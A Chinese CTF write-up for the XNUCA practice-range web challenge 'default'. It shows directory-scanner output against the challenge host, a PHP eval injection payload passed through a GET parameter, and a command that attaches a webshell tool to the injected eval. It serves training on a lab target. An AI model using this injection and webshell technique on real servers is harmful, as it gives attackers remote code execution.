[XNUCA 练习靶场](web)default

作者: 王一航 | 来源:发表于2017-08-12 21:50 被阅读153次

[XNUCA 练习靶场](web)default
[XNUCA 练习靶场](web)login
[XNUCA 练习靶场](web)Document
[XNUCA 练习靶场](web)阳光总在风雨后
[XNUCA 进阶靶场vote](web)writeup
[XNUCA 练习靶场](web)login (关于通过文件上传
DVWA练习记录——File Upload
DVWA练习记录——CSRF
[XNUCA 进阶篇](web)writeup
Ogeek 线上Web Writeup

简介 :
default
(破解人数:8)

描述：主页都没有了，就不要扫我了
http://218.76.35.74:20131

主页啥都没有 , 不扫一波还等着干嘛 ?

SourceLeakHacker ›› python SourceLeakHacker.py http://218.76.35.74:20131/ 32 32
 [ 403 ]  Checking : http://218.76.35.74:20131/
 [ 403 ]  Checking : http://218.76.35.74:20131/.htpasswd
 [ 403 ]  Checking : http://218.76.35.74:20131/.htaccess
 [ 403 ]  Checking : http://218.76.35.74:20131/.hta
 [ 403 ]  Checking : http://218.76.35.74:20131/cgi-bin//
 [ 403 ]  Checking : http://218.76.35.74:20131/cgi-bin/
 [ 403 ]  Checking : http://218.76.35.74:20131/error/
 [ 200 ]  Checking : http://218.76.35.74:20131/icons/
 [ 200 ]  Checking : http://218.76.35.74:20131/index2.php/

这里就不得不体现出一个强大的扫描器的重要性了

SourceLeakHacker

image.png

http://218.76.35.74:20131/index2.php?hello=%27%27);eval($_GET[c]&c=phpinfo();

image.png

照例 [Webshell-Sniper] 连接一波 :

python sniper.py 'http://218.76.35.74:20131/index2.php?hello=);eval($_POST[c]' POST c

image.png

网友评论

CTF

本文标题：[XNUCA 练习靶场](web)default

本文链接：https://www.haomeiwen.com/subject/phajrxtx.html

延伸阅读

深度阅读

您也可以注册成为美文阅读网的作者，发表您的原创作品、分享您的心情！

[XNUCA 练习靶场](web)default

相关文章

[XNUCA 练习靶场](web)default

[XNUCA 练习靶场](web)login

[XNUCA 练习靶场](web)Document

[XNUCA 练习靶场](web)阳光总在风雨后

[XNUCA 进阶靶场vote](web)writeup

[XNUCA 练习靶场](web)login (关于通过文件上传

DVWA练习记录——File Upload

DVWA练习记录——CSRF

[XNUCA 进阶篇](web)writeup

Ogeek 线上Web Writeup

网友评论

延伸阅读

深度阅读

栏目导航

热点阅读

CTF